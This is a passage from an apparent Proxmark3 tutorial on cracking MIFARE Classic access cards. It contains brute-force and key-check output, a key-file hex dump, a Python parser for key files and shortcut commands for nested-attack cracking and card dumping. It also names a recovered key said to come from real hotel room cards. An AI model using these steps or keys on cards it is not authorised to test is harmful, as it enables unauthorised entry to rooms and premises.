      31 |    1991 | Brute force phase completed. Key found: 2a2c13cc242a    |               0 |    0s

So we found the key 2a2c13cc242a. We’ll now pass this back to fchk.

pm3 --> hf mf fchk 1 2a2c13cc242a d
[ 0] key 2A 2C 13 CC 24 2A           
[+] Running strategy 1          

[-] Chunk: 0,5s | found 30/32 keys (1)          
[+] Running strategy 2          

[-] Chunk: 0,5s | found 32/32 keys (1)          
[+] Time in checkkeys (fast):  0,9s
          
|---|----------------|---|----------------|---|          
|sec|key A           |res|key B           |res|          
|---|----------------|---|----------------|---|          
|000|  2a2c13cc242a  | 1 |  ffffffffffff  | 1 |          
|001|  2a2c13cc242a  | 1 |  ffffffffffff  | 1 |          
|002|  2a2c13cc242a  | 1 |  ffffffffffff  | 1 |          
|003|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|004|  2a2c13cc242a  | 1 |  ffffffffffff  | 1 |          
|005|  2a2c13cc242a  | 1 |  ffffffffffff  | 1 |          
|006|  2a2c13cc242a  | 1 |  ffffffffffff  | 1 |          
|007|  2a2c13cc242a  | 1 |  ffffffffffff  | 1 |          
|008|  2a2c13cc242a  | 1 |  ffffffffffff  | 1 |          
|009|  2a2c13cc242a  | 1 |  ffffffffffff  | 1 |          
|010|  2a2c13cc242a  | 1 |  ffffffffffff  | 1 |          
|011|  2a2c13cc242a  | 1 |  ffffffffffff  | 1 |          
|012|  2a2c13cc242a  | 1 |  ffffffffffff  | 1 |          
|013|  2a2c13cc242a  | 1 |  ffffffffffff  | 1 |          
|014|  2a2c13cc242a  | 1 |  ffffffffffff  | 1 |          
|015|  2a2c13cc242a  | 1 |  ffffffffffff  | 1 |          
|---|----------------|---|----------------|---|          
Printing keys to binary file ...          
Found keys have been dumped to file . 0xffffffffffff has been inserted for unknown keys.

And luckily this was the only key we needed to find.

Working with -key.bin Files

When doing manual work on the -key.bin files, it is critical to note that the file starts with all A keys (sectors 0 to 15), followed by all B keys.

xxd hf-mf-84066536-key.bin 
00000000: 6661 f36c c44b 2a2c 13cc 242a ffff ffff  fa.l.K*,..$*....
00000010: ffff ffff ffff ffff 6661 f36c c44b 6661  ........fa.l.Kfa
00000020: f36c c44b 6661 f36c c44b 6661 f36c c44b  .l.Kfa.l.Kfa.l.K
00000030: 6661 f36c c44b 6661 f36c c44b 6661 f36c  fa.l.Kfa.l.Kfa.l
00000040: c44b 6661 f36c c44b 6661 f36c c44b 6661  .Kfa.l.Kfa.l.Kfa
00000050: f36c c44b 6661 f36c c44b 6661 f36c c44b  .l.Kfa.l.Kfa.l.K
00000060: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000070: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000080: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000090: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000000a0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000000b0: ffff ffff ffff ffff ffff ffff ffff ffff  ................

This is the key file created in the nested example.
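As an added example (not code from this page or from the Proxmark project), the following Python reads that layout back: it rebuilds the raw bytes from an xxd listing, splits them into the 16 A keys and 16 B keys, serialises a key set back into the same 192-byte format, and lists the entries that hold the ffffffffffff filler. The sample input is the xxd listing of the nested example's key file shown directly above; the caveat the last helper encodes is that the file format cannot distinguish a genuine factory-default key from a key fchk never found, since the tool inserts ffffffffffff for both.

```python
# Added example (not from the page or the Proxmark project): read, check and
# rebuild a Proxmark -key.bin file for a 1k card. Layout, as the xxd listing
# above shows: 16 six-byte key A entries (sectors 0..15), then 16 key B
# entries, 192 bytes (0xc0) in total.

KEY_LEN = 6
SECTORS_1K = 16
KEY_FILE_SIZE_1K = 2 * SECTORS_1K * KEY_LEN  # 192
FILLER_KEY = "ffffffffffff"  # inserted by fchk/nested for keys not found

# The key file from the nested example above, exactly as xxd printed it.
SAMPLE_XXD = """\
00000000: 6661 f36c c44b 2a2c 13cc 242a ffff ffff  fa.l.K*,..$*....
00000010: ffff ffff ffff ffff 6661 f36c c44b 6661  ........fa.l.Kfa
00000020: f36c c44b 6661 f36c c44b 6661 f36c c44b  .l.Kfa.l.Kfa.l.K
00000030: 6661 f36c c44b 6661 f36c c44b 6661 f36c  fa.l.Kfa.l.Kfa.l
00000040: c44b 6661 f36c c44b 6661 f36c c44b 6661  .Kfa.l.Kfa.l.Kfa
00000050: f36c c44b 6661 f36c c44b 6661 f36c c44b  .l.Kfa.l.Kfa.l.K
00000060: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000070: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000080: ffff ffff ffff ffff ffff ffff ffff ffff  ................
00000090: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000000a0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
000000b0: ffff ffff ffff ffff ffff ffff ffff ffff  ................
"""


def parse_xxd(text):
    """Rebuild raw bytes from an xxd listing: drop the offset column and the
    ASCII column (xxd separates the latter from the hex groups by two spaces)."""
    out = bytearray()
    for line in text.splitlines():
        if ":" not in line:
            continue
        hex_groups = line.split(":", 1)[1].split("  ", 1)[0]
        out += bytes.fromhex(hex_groups.replace(" ", ""))
    return bytes(out)


def parse_key_file(data):
    """Return {sector: (key_a_hex, key_b_hex)} from raw key-file bytes."""
    if len(data) != KEY_FILE_SIZE_1K:
        raise ValueError(f"expected {KEY_FILE_SIZE_1K} bytes, got {len(data)}")
    half = SECTORS_1K * KEY_LEN  # B keys start after all A keys
    keys = {}
    for sector in range(SECTORS_1K):
        a = data[sector * KEY_LEN:(sector + 1) * KEY_LEN].hex()
        b = data[half + sector * KEY_LEN:half + (sector + 1) * KEY_LEN].hex()
        keys[sector] = (a, b)
    return keys


def build_key_file(keys):
    """Inverse of parse_key_file: all A keys, then all B keys, 6 bytes each."""
    if sorted(keys) != list(range(SECTORS_1K)):
        raise ValueError("need exactly sectors 0..15")
    a_part = b"".join(bytes.fromhex(keys[s][0]) for s in range(SECTORS_1K))
    b_part = b"".join(bytes.fromhex(keys[s][1]) for s in range(SECTORS_1K))
    return a_part + b_part


def filler_entries(keys):
    """(sector, 'A'|'B') pairs holding ffffffffffff. The file cannot tell a
    genuine factory-default key from one fchk never found, so cross-check
    these against the res column of the fchk table before relying on them."""
    return [(s, kind) for s in range(SECTORS_1K)
            for kind, key in zip("AB", keys[s]) if key == FILLER_KEY]


if __name__ == "__main__":
    keys = parse_key_file(parse_xxd(SAMPLE_XXD))
    for sector, (a, b) in keys.items():
        print(f"sector {sector:2d}: A={a} B={b}")
    print("filler entries:", filler_entries(keys))
```

For a real file, replace parse_xxd(SAMPLE_XXD) with open("hf-mf-<UID>-key.bin", "rb").read(); build_key_file produces bytes you can write out and pass to hf mf dump with the k parameter.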

Random Notes

You might have noticed that both examples used the key 2a2c13cc242a. This was actually a complete accident! The first card (nested attack) came from a hotel in San Francisco (big chain), the second one (hardnested) came from a hotel in Waikiki (single hotel). A very rough guess, but I guess the access control systems might just be from the same vendor.

Shortcuts

Dumping a Card with default keys

hf mf fchk 1 d
hf mf dump 1

Dumping a Card and Cracking Using Nested Attack

hf mf fchk 1 d
hf mf nested 1 X Y zzzzzzzzzzzz d
hf mf dump 1
  • Replace the X with a block for which you have a key.
  • Replace the Y with an A or B depending on the type of key you have.
  • Replace zzzzzzzzzzzz with the known key. This will often just be ffffffffffff.